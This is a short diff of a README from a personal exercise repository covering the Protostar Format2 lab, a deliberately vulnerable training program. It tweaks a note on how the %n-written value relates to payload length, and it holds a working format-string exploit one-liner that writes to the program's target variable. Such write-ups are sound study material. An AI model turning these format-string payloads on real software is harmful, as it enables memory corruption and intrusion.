nitzanadut/Exercises/Low_Level/Protostar/Format2/README.md

 target is 43 :(
 ```

-Looks like the value of target = number of chars before %n + 39
+Looks like the value of target = number of chars before %n + 39 (Length of the payload)

 ```diff
 $ python -c "from struct import pack; print 'AAAA' + pack('<I', 0x080496e4) + '%x '*4 + 25*'A' + '%n'" | ./format2